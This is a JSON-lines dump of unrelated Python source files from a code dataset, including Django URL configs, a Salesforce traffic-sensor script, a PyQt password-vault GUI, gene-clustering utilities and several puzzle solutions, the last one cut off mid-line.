+{"seq_id":"148872308","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\n\r\nhandler404 = 'main.views.page_not_found_view'\r\nhandler500 = 'main.views.error_view'\r\nhandler403 = 'main.views.permission_denied_view'\r\nhandler400 = 'main.views.bad_request_view'\r\n\r\nurlpatterns = [\r\n url(r'^(?i)quickstart/', views.quick_start, name='quick_start'),\r\n url(r'^(?i)use/autohotkey/', views.use_auth, name='use_ahk'),\r\n url(r'^$', views.introduction, name='introduction'),\r\n]\r\n","sub_path":"docs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"189474784","text":"# Serial Data Streaming from Arduino to Salesforce\n# Created by: Jack Galletta, Summer 2019\n# jgalletta@salesforce.com\n\n# import packages\nfrom simple_salesforce import Salesforce, SalesforceLogin\nfrom Credentials import username, password\nimport serial\nimport threading\nimport datetime\nimport re\n\n\n# logging into Salesforce\nsession_id, instance = SalesforceLogin(username=username, password=password)\nsf = Salesforce(instance=instance, session_id=session_id)\nprint('Successfully logged in!')\nprint('Wating to detect cars...')\n# Logged in! Now perform API actions, SOQL queries, etc.\n\n# object to read in serial data from port: '/dev/cu.usbmodem14201'\narduinoData = serial.Serial('/dev/cu.usbmodem14201', 9600)\n\nmyid = str(sf.query(\"SELECT Id FROM Traffic_Tracker__c\"))\npattern = \"'Id', '(.{18})'\"\nr1 = re.findall(pattern, myid)\nttid = r1[0]\n\n#query besthour object and strip the ID value\nconstquery = str(sf.query(\"SELECT BHID__c FROM BestHourConst__c\"))\nid = str(sf.query(\"SELECT Id FROM Best_Hour__c\"))\npattern = \"'Id', '(.{18})'\"\nr1 = re.findall(pattern, id)\nbhid = r1[0]\nif constquery[27] == '0':\n sf.BestHourConst__c.create({\"BHID__c\": bhid})\n besthourconstupdate = str(sf.query(\"SELECT BHID__c FROM BestHourConst__c\"))\n print(\"First time setup is complete!\")\n\n# creating variables to store data and upload to org\ncarCount = 0\nsensorCount = 0\ndata = 0\nupdated = True\ntotalCars = 0\n\n# opens previously saved car per hour values into array called fullday\nfullday = []\nwith open(\"hourrecord.txt\", 'r') as f:\n for line in f:\n fullday.append(int(line.strip()))\n\ndef bestHour():\n threading.Timer(5, bestHour).start()\n\n currentDT = datetime.datetime.now()\n\n # determines and assigns best hour fields\n #fullday[int(currentDT.strftime(\"%H\"))] += 1\n\n #print(fullday)\n currhour = int(currentDT.strftime(\"%H\"))\n\n # for medium and low priority cases, searches through next 6 hours of traffic data\n medsubset = (fullday[currhour: currhour + 6])\n\n # for high priority cases, searches through next 3 hours of traffic data\n highsubset = (fullday[currhour: currhour + 3])\n\n # for critical cases, select the current hour as best time\n\n medminindex = currhour\n # print(medsubset)\n medmin = medsubset[0]\n for i in range(len(medsubset)):\n if medsubset[i] < medmin:\n medmin = medsubset[i]\n medminindex = currhour + i\n\n highminindex = currhour\n highmin = highsubset[0]\n for i in range(len(highsubset)):\n if highsubset[i] < highmin:\n highmin = medsubset[i]\n highminindex = currhour + i\n #print(highminindex)\n\n #print(str(medmin) + \", \" + str(medminindex))\n #print(str(highmin) + \", \" + str(highminindex))\n sf.Best_Hour__c.update(bhid, {\"LowMedium_Priority__c\": medminindex, \"High_Priority__c\": highminindex, \"Crit_Priority__c\": currhour})\n\n # saves the array to local file\n with open(\"hourrecord.txt\", \"w\") as f:\n for i in fullday:\n f.write(str(i) + \"\\n\")\n\n\n# loop to read data from USB and send to org\n\ndef lowerTraffic():\n threading.Timer(15, lowerTraffic).start()\n global carCount, sensorCount\n if carCount > 0:\n carCount -= 1\n sensorCount -= 100\n sf.Traffic_Status__e.create({\"Car_Rate__c\": carCount, \"Sensor_Name__c\": \"pe test\"})\n sf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": carCount})\n print('Traffic rate lowered to: ' + str(carCount))\n\n#lowerTraffic()\nbestHour()\n\n# Initialize platform event record and reset object record\nsf.Traffic_Status__e.create({\"Car_Rate__c\": 
carCount, \"Sensor_Name__c\": \"pe test\"})\nsf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": 0})\n\nwhile True:\n # reads in serial data, strips it, and decodes it\n rawdata = (arduinoData.readline().strip())\n data = int(rawdata.decode('utf-8'))\n # extra print statement for viewing live da ta/debugging\n #print(data)\n\n # checks to see if object is <= 10cm from sensor and in front of sensor for > 1s\n if data <= 10:\n sensorCount += 1\n if sensorCount %80 == 0:\n carCount = int(sensorCount/80);\n print('Car detected, cars counted is: ' + str(carCount))\n totalCars += 1\n\n # ~~~THE MAGIC LINE OF CODE~~~\n # upserts a platform event of type traffic_status__e into the org, using # of cars counted as a parameter\n sf.Traffic_Status__e.create({\"Car_Rate__c\": carCount, \"Sensor_Name__c\": \"pe test\"})\n sf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": carCount})\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n print('Platform Event and Object successfully upserted')\n currentDT = datetime.datetime.now()\n sf.Car__c.create({\"Name\": 'c' + str(totalCars), \"Location__c\": 'Reston', \"Hour__c\": currentDT.strftime(\"%H\"), \"Timestamp__c\": currentDT.strftime(\"%H:%M:%S\")})\n #print('Car timestamp record successfully created')\n\n #increments cars within the hour\n fullday[int(currentDT.strftime(\"%H\"))] += 1","sub_path":"Serial Stream.py","file_name":"Serial Stream.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"288649302","text":"\"\"\"\nNeed to change unicode string to normal string, otherwise translate won't work\n\"\"\"\nclass Solution(object):\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n paragraph = paragraph.encode('ascii','ignore')\n pureWords = paragraph.translate(None, \"!?',;.\")\n counter = {}\n for word in pureWords.split(\" \"):\n lower = word.lower()\n if lower not in banned:\n if lower not in counter:\n counter[lower] = 1\n else:\n counter[lower] += 1\n return max(counter, key= counter.get)\n","sub_path":"solution/python/819.py","file_name":"819.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"586600106","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport logging\nimport asyncio\nimport sys\nimport json\nimport time\nimport weakref\nimport traceback\nimport textwrap\n\nfrom .AsyncClient import AsyncClient\n\nfrom .SourceModAPI import SourceModAPI\nfrom .Subscribe import GameEvents, Forwards\n\nfrom .Utils import Utils\nfrom .Config import Config\nfrom .CommandHandler import CommandHandler\nfrom .AccessManager import AccessManager\nfrom .PlayerManager import PlayerManager\nfrom .AudioManager import AudioManager\n\nclass Torchlight():\n\tdef __init__(self, master):\n\t\tself.Logger = logging.getLogger(__class__.__name__)\n\t\tself.Master = master\n\t\tself.Config = self.Master.Config\n\t\tself.WeakSelf = weakref.ref(self)\n\n\t\tself.API = SourceModAPI(self.WeakSelf)\n\t\tself.GameEvents = GameEvents(self.WeakSelf)\n\t\tself.Forwards = Forwards(self.WeakSelf)\n\n\t\tself.DisableVotes = set()\n\t\tself.Disabled = 0\n\t\tself.LastUrl = None\n\n\tdef InitModules(self):\n\t\tself.Access = AccessManager()\n\t\tself.Access.Load()\n\n\t\tself.Players = PlayerManager(self.WeakSelf)\n\n\t\tself.AudioManager = AudioManager(self.WeakSelf)\n\n\t\tself.CommandHandler = CommandHandler(self.WeakSelf)\n\t\tself.CommandHandler.Setup()\n\n\t\tself.GameEvents.HookEx(\"server_spawn\", self.Event_ServerSpawn)\n\t\tself.GameEvents.HookEx(\"player_say\", self.Event_PlayerSay)\n\n\tdef SayChat(self, message, player=None):\n\t\tmessage = \"\\x0700FFFA[Torchlight]: \\x01{0}\".format(message)\n\t\tif len(message) > 976:\n\t\t\tmessage = message[:973] + \"...\"\n\t\tlines = textwrap.wrap(message, 244, break_long_words = True)\n\t\tfor line in lines:\n\t\t\tasyncio.ensure_future(self.API.PrintToChatAll(line))\n\n\t\tif player:\n\t\t\tLevel = 0\n\t\t\tif player.Access:\n\t\t\t\tLevel = player.Access[\"level\"]\n\n\t\t\tif Level < self.Config[\"AntiSpam\"][\"ImmunityLevel\"]:\n\t\t\t\tcooldown = len(lines) * self.Config[\"AntiSpam\"][\"ChatCooldown\"]\n\t\t\t\tif player.ChatCooldown > self.Master.Loop.time():\n\t\t\t\t\tplayer.ChatCooldown += cooldown\n\t\t\t\telse:\n\t\t\t\t\tplayer.ChatCooldown = self.Master.Loop.time() + cooldown\n\n\tdef SayPrivate(self, player, message):\n\t\tmessage = \"\\x0700FFFA[Torchlight]: \\x01{0}\".format(message)\n\t\tif len(message) > 976:\n\t\t\tmessage = message[:973] + \"...\"\n\t\tlines = textwrap.wrap(message, 244, break_long_words = True)\n\t\tfor line in lines:\n\t\t\tasyncio.ensure_future(self.API.PrintToChat(player.Index, line))\n\n\tdef Reload(self):\n\t\tself.Config.Load()\n\t\tself.CommandHandler.NeedsReload = True\n\n\tasync def Send(self, data):\n\t\treturn await self.Master.Send(data)\n\n\tdef OnPublish(self, obj):\n\t\tif obj[\"module\"] == \"gameevents\":\n\t\t\tself.GameEvents.OnPublish(obj)\n\t\telif obj[\"module\"] == \"forwards\":\n\t\t\tself.Forwards.OnPublish(obj)\n\n\tdef Event_ServerSpawn(self, hostname, address, ip, port, game, mapname, maxplayers, os, dedicated, password):\n\t\tself.DisableVotes = set()\n\t\tself.Disabled = 0\n\n\tdef Event_PlayerSay(self, userid, text):\n\t\tif userid == 0:\n\t\t\treturn\n\n\t\tPlayer = self.Players.FindUserID(userid)\n\t\tasyncio.ensure_future(self.CommandHandler.HandleCommand(text, Player))\n\n\tdef __del__(self):\n\t\tself.Logger.debug(\"~Torchlight()\")\n\n\nclass TorchlightHandler():\n\tdef __init__(self, loop):\n\t\tself.Logger = logging.getLogger(__class__.__name__)\n\t\tself.Loop = loop if loop else asyncio.get_event_loop()\n\t\tself._Client = None\n\t\tself.Torchlight = 
None\n\t\tself.Config = Config()\n\n\t\tasyncio.ensure_future(self._Connect(), loop = self.Loop)\n\n\tasync def _Connect(self):\n\t\t# Connect to API\n\t\tself._Client = AsyncClient(self.Loop, self.Config[\"SMAPIServer\"][\"Host\"], self.Config[\"SMAPIServer\"][\"Port\"], self)\n\t\tawait self._Client.Connect()\n\n\t\tself.Torchlight = Torchlight(self)\n\n\t\t# Pre Hook for late load\n\t\tawait self.Torchlight.GameEvents._Register([\"player_connect\", \"player_activate\"])\n\t\tawait self.Torchlight.Forwards._Register([\"OnClientPostAdminCheck\"])\n\n\t\tself.Torchlight.InitModules()\n\n\t\t# Late load\n\t\tawait self.Torchlight.GameEvents.Replay([\"player_connect\", \"player_activate\"])\n\t\tawait self.Torchlight.Forwards.Replay([\"OnClientPostAdminCheck\"])\n\n\tasync def Send(self, data):\n\t\treturn await self._Client.Send(data)\n\n\tdef OnPublish(self, obj):\n\t\tself.Torchlight.OnPublish(obj)\n\n\tdef OnDisconnect(self, exc):\n\t\tself.Logger.info(\"OnDisconnect({0})\".format(exc))\n\t\tself.Torchlight = None\n\n\t\tasyncio.ensure_future(self._Connect(), loop = self.Loop)\n\n\tdef __del__(self):\n\t\tself.Logger.debug(\"~TorchlightHandler()\")\n","sub_path":"Torchlight/Torchlight.py","file_name":"Torchlight.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
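SayChat and SayPrivate in the record above cap a message at 976 characters and then split it into 244-character lines before printing to chat. The chunking in isolation, to show how those two limits interact:

import textwrap

message = "x" * 1200
if len(message) > 976:
    message = message[:973] + "..."
lines = textwrap.wrap(message, 244, break_long_words=True)
print(len(lines), max(len(line) for line in lines))  # 4 lines, none over 244 chars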
+{"seq_id":"105384297","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index,name=\"index\"),\n\turl(r'NutritionGuide',views.NutritionGuide,name=\"NutritionGuide Guide\"),\n\turl(r'Resources',views.resources,name=\"Resources\"),\n\turl(r'FoodMap',views.foodMap,name=\"Food Map\"),\n\turl(r'DietaryInfo',views.dietaryInfo,name=\"DietaryInfo\"),\n\turl(r'menu/(?P(\\w*\\W*)+)',views.menu, name=\"Menu\")\n]\n","sub_path":"GuelphFoodGuide/GuelphFoodGuideSite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"363771109","text":"# Life is short, use Python\n# ---- utf-8 ----\n# @Time : 2018/5/22 11:00\n# @Author : Gao DongShan\n# @File : main_menu.py\n# @Start :-----------------\n\n\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, QMenu, qApp, QTableView\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtCore import QCoreApplication, Qt\nfrom PyQt5.QtSql import QSqlTableModel, QSqlDatabase, QSqlQuery\n\nID, SITE, NAME, PASS, REMARK = range(5)\n\n\nclass MainMenu(QMainWindow):\n\n def __init__(self, parent=None):\n super(MainMenu, self).__init__(parent)\n\n # ----------------- UI --------------------------#\n loadUi(\"./UI/main_ui.ui\", self)\n self.setWindowTitle(\"密码保险柜\")\n self.setWindowIcon(QIcon(\"./image/1.ico\"))\n\n # ----------------- 按键 --------------------------#\n self.pushButtonExit.clicked.connect(QCoreApplication.instance().quit)\n self.pushButtonDel.clicked.connect(self.delete)\n self.pushButtonAdd.clicked.connect(self.add)\n self.refresh.clicked.connect(self.reselect)\n\n # ----------------- db --------------------------#\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\n self.db.setDatabaseName(\"./db/word.db\")\n\n # ----------------- model --------------------------#\n self.model = QSqlTableModel()\n self.model.setTable(\"warehouse\")\n self.model.setSort(ID, Qt.AscendingOrder)\n self.model.setHeaderData(ID, Qt.Horizontal, \"ID\")\n self.model.setHeaderData(SITE, Qt.Horizontal, \"站点\")\n self.model.setHeaderData(NAME, Qt.Horizontal, \"账号\")\n self.model.setHeaderData(PASS, Qt.Horizontal, \"密码\")\n self.model.setHeaderData(REMARK, Qt.Horizontal, \"备注\")\n self.model.setEditStrategy(QSqlTableModel.OnFieldChange)\n\n # ----------------- tableView --------------------------#\n self.tableView.setModel(self.model)\n self.tableView.horizontalHeader().setStretchLastSection(True)\n\n # ----------------- query --------------------------#\n self.query = QSqlQuery()\n\n def contextMenuEvent(self, event):\n cmenu = QMenu()\n quitAct = cmenu.addAction(\"退出\")\n action = cmenu.exec_(self.mapToGlobal(event.pos()))\n if action == quitAct:\n qApp.quit()\n\n def add(self):\n self.query.exec(\"insert into `warehouse` VALUES (NULL ,'example.com','example','example','example')\")\n self.reselect()\n rows = self.model.rowCount()\n self.tableView.selectRow(rows)\n\n def delete(self):\n row = self.tableView.currentIndex().row()\n site_id = self.model.data(self.model.index(row, 0))\n sql = \"delete from `warehouse` where id =\" + str(site_id)\n self.query.exec(sql)\n self.reselect()\n\n def reselect(self):\n if self.model.data(self.model.index(self.model.rowCount(), 0)) != \"\":\n self.model.select()\n","sub_path":"main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130659259","text":"__author__ = 'ayal'\n\nfrom celery.task import task\nfrom mapreduce.mrMap import dtToMonthly\nfrom mapreduce.__init__ import usageConfig\n\ndef maxCircuit(db, dt, group, clampers):\n\n def _getPrevMonth():\n prevMonth = dt.month - 1\n if dt.month == 1: prevMonth = 12\n query = {\"month\": prevMonth,\"year\":dt.year, \"groupid\": group}\n return db[\"monthlyCircuitDemand\"].find(query)\n\n prevInfo = _getPrevMonth()\n siteid = clampers[0][\"siteid\"]\n groupInfo = ({\"amps\": x[\"maxamps\"], \"clamperid\":[\"clamperid\"]} for x in clampers)\n currentMax = max(x[\"amps\"] for x in groupInfo)\n numMonths = 1\n prevailingMax = currentMax\n\n if prevInfo != None:\n prevailingMax = prevInfo[\"maxprevailing\"]\n numMonths = prevInfo[\"nummonths\"]\n if currentMax > prevailingMax:\n prevailingMax = currentMax\n numMonths = 1\n elif currentMax < prevailingMax:\n if numMonths == 3:\n numMonths = 1\n prevailingMax = currentMax\n else: numMonths += 1\n doc = {\"siteid\":siteid, \"groupid\": group, \"month\": dt.month, \"year\": dt.year,\n \"maxReadings\": list(groupInfo),\n \"nummonths\": numMonths, \"prevailingmax\": prevailingMax}\n return doc\n\n@task\ndef groupMaxAmpsSchedule(db, r, dt):\n\n def _getCircuitsForGroups():\n groups = r.smembers(\"groups\")\n vals = []\n for group in groups:\n hashKey = \"group:%s:clampers\" % group\n devcs = r.smembers(hashKey)\n vals.append({\"group\": group, \"clampers\": devcs})\n return vals\n\n fromAndTo = dtToMonthly(dt)\n fromStamp = fromAndTo[0]\n toStamp = fromAndTo[1]\n docs = []\n groups = _getCircuitsForGroups()\n for group in groups:\n clampers = map(int, list(group[\"clampers\"]))\n query = {\"fromstamp\":{\"$gte\":fromStamp, \"$lte\":toStamp}, \"clamperid\":{\"$in\": clampers}}\n vals = db[usageConfig.mongo_collections['clamper_monthly_usage']].find(query)\n doc = maxCircuit(db, dt, group, vals)\n docs.append(doc)\n db[\"monthlyCircuitDemand\"].insert(docs)","sub_path":"mapreduce/maxAmpRoutine.py","file_name":"maxAmpRoutine.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"44384663","text":"import dgl\nimport torch\nimport numpy as np\nimport pandas as pd \nfrom sklearn.cluster import KMeans\nfrom metrics import *\nimport scipy\n\ndata_name = [\"ecoli_colombos\", \"ecoli_dream5\", \"yeast_gpl2529\", \n\"yeast_dream5\", \"synth_ecoli\", \"synth_yeast\"]\n\n# 加载数据\ndef load_data(path):\n print('loading '+path.split('/')[-2]+'...')\n feature = np.load(path+'feat.npy')\n g = dgl.DGLGraph()\n src,dst,weight= [],[],[]\n with open(path+'coexp_net.txt','r') as file:\n for line in file:\n a,b,w = int(line.split()[0]),int(line.split()[1]),float(line.split()[2])\n src.append(a)\n dst.append(b)\n weight.append(w)\n g.add_nodes(feature.shape[0]) # 添加节点\n g.add_edges(src+dst,dst+src) # 添加双向边\n dgl.add_self_loop(g) \n g.ndata['feat'] = torch.FloatTensor(feature)\n g.edata['weight'] = torch.FloatTensor(weight+weight)\n\n id_gene,gene_id = {},{}\n with open(path+'id_gene.txt','r') as file:\n for line in file:\n num,gene = int(line.split()[0]),line.split()[1]\n id_gene[num] = gene\n gene_id[gene] = num \n return id_gene,gene_id,g\n\n# 提前结束,保存模型\nclass EarlyStopping(object):\n def __init__(self, args):\n self.filename = args.path+'model.pth'\n self.patience = args.patience\n self.counter = 0\n self.best_loss = None\n self.early_stop = False\n\n def step(self, loss, model):\n if self.best_loss is None:\n self.best_loss = loss\n self.save_checkpoint(model)\n elif (loss > self.best_loss):\n self.counter += 1\n # print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\n if self.counter >= self.patience:\n self.early_stop = True\n else:\n if (loss <= self.best_loss):\n self.save_checkpoint(model)\n self.best_loss = np.min((loss, self.best_loss))\n self.counter = 0\n return self.early_stop\n\n def save_checkpoint(self, model):\n \"\"\"Saves model when validation loss decreases.\"\"\"\n torch.save(model.state_dict(), self.filename)\n\n def load_checkpoint(self, model):\n \"\"\"Load the latest checkpoint.\"\"\"\n model.load_state_dict(torch.load(self.filename))\n\n# transform affiliation matrix into N*m\ndef cal_matrix(minimal_path,gene):\n minimal = pd.read_json(minimal_path)\n tmp = minimal.values.reshape(minimal.shape[0]*minimal.shape[1],)\n tmp = np.array(list(set(tmp)))\n gene_mark = [elem in tmp for elem in gene]\n\n data = minimal.T.apply(pd.value_counts)\n data = pd.DataFrame(data,index = gene)\n matrix = np.array(data)\n matrix[np.isnan(matrix)] = 0\n return matrix[gene_mark],gene_mark \n\n# kmean\ndef kmean(feat,n_clusters = 100):\n knn = KMeans(n_clusters = n_clusters,init = 'k-means++',n_init = 10,max_iter = 300,random_state=0)\n knn.fit(feat)\n matrix = np.zeros((feat.shape[0],n_clusters))\n for i in range(feat.shape[0]):\n matrix[i][knn.labels_[i]] = 1\n return matrix\n\n# hcluster\ndef hcluster(feat, n_cluster=100,metric='euclidean',method='ward'):\n import scipy.cluster.hierarchy as hcl\n\n disMat = hcl.distance.pdist(X = feat, metric=metric)\n linkage = hcl.linkage(disMat, method='ward')\n # hcluster.dendrogram(linkage, leaf_font_size=10.)\n labels = hcl.fcluster(linkage, n_cluster, criterion='maxclust')\n matrix = np.zeros((feat.shape[0],n_cluster))\n for i in range(labels.shape[0]):\n matrix[i][labels[i]-1] = 1\n return matrix\n\n# 计算相似度\ndef simdist(emb, simdist_function=\"pearson_correlation_abs\", similarity=True, **kwargs):\n choices = {\n \"pearson_correlation\": lambda emb: np.corrcoef(emb),\n \"pearson_correlation_abs\": lambda emb: np.abs(np.corrcoef(emb))\n }\n\n func = choices[simdist_function]\n simdist_matrix = func(emb)\n\n if 
similarity == True:\n pass\n else:\n simdist_matrix = (-simdist_matrix) + simdist_matrix.max().max()\n print(simdist_matrix)\n return simdist_matrix\n \n# adjust matrix\ndef adjust(matrix,mark,top_k = 3):\n tmp = matrix[mark]\n mark_2 = np.where(tmp.sum(0) >= top_k)[0]\n tmp = tmp[:,mark_2]\n return tmp\n\n# 计算F1score 和 Nmi 指标\ndef cal_metric(args):\n gene_id = {}\n with open(args.path+'id_gene.txt','r') as file:\n for line in file:\n num,gene = int(line.split()[0]),line.split()[1]\n gene_id[gene] = num \n\n data = args.path.split('/')[-2]\n print(type(data_name[0]))\n minimal_path,strict_path = args.path+'knownmodules/minimal.json',args.path+'knownmodules/strict.json'\n minimal_matrix,minimal_mark = cal_matrix(minimal_path,gene_id.keys())\n strict_matrix,strict_mark = cal_matrix(strict_path,gene_id.keys())\n \n emb = np.load(args.path+'emb.npy')\n\n # 数据标准化\n eps = 1e-5\n mu = np.mean(emb,axis = 0)\n sigma = np.std(emb,axis = 0)\n tmp = (emb - mu) / (sigma + eps)\n\n print('deepgmd_cluster:')\n matrix = hcluster(tmp,args.k)\n res_minimal = adjust(matrix,minimal_mark,top_k = 3)\n res_strict = adjust(matrix,strict_mark,top_k = 3)\n\n relevance,recovery = cal_overlap(res_minimal,minimal_matrix)\n nmi = cal_nmi(res_minimal,minimal_matrix)\n print(\"minimal: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n relevance,recovery = cal_overlap(res_strict,strict_matrix)\n nmi = cal_nmi(res_strict,strict_matrix)\n print(\"strict: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n\n print('deepgmd:')\n matrix = emb\n matrix[matrix > args.threshold] = 1\n matrix[matrix < args.threshold] = 0\n res_minimal = adjust(matrix,minimal_mark,top_k = 3)\n res_strict = adjust(matrix,strict_mark,top_k = 3)\n\n relevance,recovery = cal_overlap(res_minimal,minimal_matrix)\n nmi = cal_nmi(res_minimal,minimal_matrix)\n print(\"minimal: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n relevance,recovery = cal_overlap(res_strict,strict_matrix)\n nmi = cal_nmi(res_strict,strict_matrix)\n print(\"strict: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
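Both kmean and hcluster in the record above return hard assignments as an N x k one-hot membership matrix via an explicit loop; the same construction vectorized with fancy indexing (zero-based labels assumed, so hcluster's 1-based fcluster labels would need the -1 shift first):

import numpy as np

def labels_to_membership(labels, n_clusters):
    # one row per sample, a single 1 in that sample's cluster column
    labels = np.asarray(labels)
    membership = np.zeros((labels.shape[0], n_clusters))
    membership[np.arange(labels.shape[0]), labels] = 1
    return membership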
+{"seq_id":"111079000","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def constructMaximumBinaryTree(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n length = len(nums)\n if length > 1000 or length <= 0:\n return\n\n return self.getSubTtree(nums, 0, length)\n\n def getSubTtree(self, nums, start, end):\n if start >= end:\n return None\n max_val = max(nums[start: end])\n node = TreeNode(max_val)\n node.left = self.getSubTtree(nums, start, nums.index(max_val))\n node.right = self.getSubTtree(nums, nums.index(max_val) + 1, end)\n return node\n\n\nclass Solution2(object):\n def constructMaximumBinaryTree(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if not nums:\n return None\n max_val = max((nums))\n node = TreeNode(max_val)\n i = nums.index(max_val)\n if nums[:i]:\n node.left = self.constructMaximumBinaryTree(nums[:i])\n if nums[i + 1:]:\n node.right = self.constructMaximumBinaryTree(nums[i + 1:])\n return node\n","sub_path":"Repo/654_Maximum_Binary_Tree.py","file_name":"654_Maximum_Binary_Tree.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"483702425","text":"s = input()\nk = int(input())\n\ncnt = 0\nalps = 'abcdefghijklmnopqrstuvwxyz'\nfor alp in alps:\n inds = []\n for i,si in enumerate(s):\n if si == alp:\n inds.append(i)\n if inds:\n s_set = set()\n for ind in inds:\n for i in range(1,6):\n if ind+i <= len(s):\n s_set.add(s[ind:ind+i])\n sl = list(s_set)\n if cnt + len(sl) >= k:\n sl.sort()\n print(sl[k-cnt-1])\n exit()\n else:\n cnt += len(sl)\n","sub_path":"3_virtual_contest/asa_0809/arc097_a.py","file_name":"arc097_a.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"208371619","text":"import sys\n\nfilename = sys.argv[1]\nfile = open(filename, 'r')\n\nnodeMap = {}\n\nfor line in file:\n split = line.split(\"<->\")\n host = int(split[0])\n targets = split[1]\n nodeMap[host] = []\n for target in targets.split(\",\"):\n target = int(target.strip())\n nodeMap[host].append(target)\n\ndef bfs(node, nodeMap):\n visited = {}\n queue = [node]\n while len(queue) > 0:\n node = queue.pop()\n\n if node in visited:\n continue\n\n visited[node] = True\n\n for child in nodeMap[node]:\n if child not in visited:\n queue.append(child)\n\n return len(visited)\n\nprint(bfs(0, nodeMap))\n","sub_path":"2017/day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511925381","text":"# coding=utf8\n\nimport sys, re, logging, os, random, urllib2, hashlib, time, wave, struct, traceback\n\nimport numpy as np\nimport scipy\n\nfrom common import VoiceEntry, Song, VocalPitch, \\\n\t\tget_sqla_session, SCRIPT_DIR, SOUND_DEPTH, iframes_to_frames, frames_to_iframes, \\\n\t\tMAX_SAMPLE_VAL, MIN_SAMPLE_VAL, \\\n\t\tget_dominant_pitch\n\n\n__llevel = logging.DEBUG\nlogging.basicConfig( format=\"%(asctime)s [%(levelname)s] %(message)s\" )\nLOG = logging.getLogger(\"simple_logger\")\nLOG.setLevel( __llevel )\n\n\n#from pylab import plot, show, title, xlabel, ylabel, subplot\n\nCHUNK_SIZE = 8192 * 2\nCHUNK_OVERLAP = 1024\n\n\n\n\ndef get_pitch_list( iframes, srate, chunk_size, overlap ):\n\t# based on http://glowingpython.blogspot.pt/2011/08/how-to-plot-frequency-spectrum-with.html\n\t#\n\tiframes_nparr = np.array( iframes )\n\n\tpitch_list = list()\n\n\tfor i in range(0, len(iframes_nparr), chunk_size):\n#\t\tsubplot(2,1,1)\n#\t\tplot( np.array(range(i,i+CHUNK_SIZE))/float(srate), iframes_nparr[ i:(i+chunk_size) ])\n#\t\txlabel('Time')\n#\t\tylabel('Amplitude')\n#\t\tsubplot(2,1,2)\n#\t\tplot(freqs,abs(Z),'r') # plotting the spectrum\n#\t\txlabel('Freq (Hz)')\n#\t\tylabel('|Y(freq)|')\n#\t\tshow()\n#\t\tsys.stdin.read(1)\n\n\t\tdom_pitch_info = get_dominant_pitch( iframes_nparr, i, srate, chunk_size, overlap )\n\t\tif dom_pitch_info:\n\t\t\tfreq, mag = dom_pitch_info\n\t\t\tpitch_list.append( (i,freq,mag) )\n\n\treturn pitch_list\t\n\n\t\t\n\t\t\t\t\n\t\t\n\t\t\n\n\n\ndef gen_vocal_pitches( session, song_title, vsong_path ):\n\tsong = session.query( Song ).get( song_title )\n\tif song is None:\n\t\tLOG.error( \"song not found!\" )\n\t\traise Exception()\n\n\tnchannels = 1\n\tsrate = 44100\n\tsdepth = 2\n\n\tchunk_size = CHUNK_SIZE\n\tchunk_overlap = CHUNK_OVERLAP\n\n\tsong_wav = wave.open( song.path, \"rb\" )\n\tif song_wav.getnchannels() != nchannels or song_wav.getframerate() != srate or song_wav.getsampwidth() != sdepth:\n\t\tLOG.error( \"Target song: unsupported format\" )\n\t\traise Exception()\n\tsong_wav.close()\n\n\tvsong_wav = wave.open( vsong_path, \"rb\" )\n\tif vsong_wav.getnchannels() != nchannels or vsong_wav.getframerate() != srate or vsong_wav.getsampwidth() != sdepth:\n\t\tLOG.error( \"Target song: unsupported format\" )\n\t\traise Exception()\n\n\tvsong_length = vsong_wav.getnframes()\n\tvsong_iframes = frames_to_iframes( vsong_wav.readframes( vsong_length ) 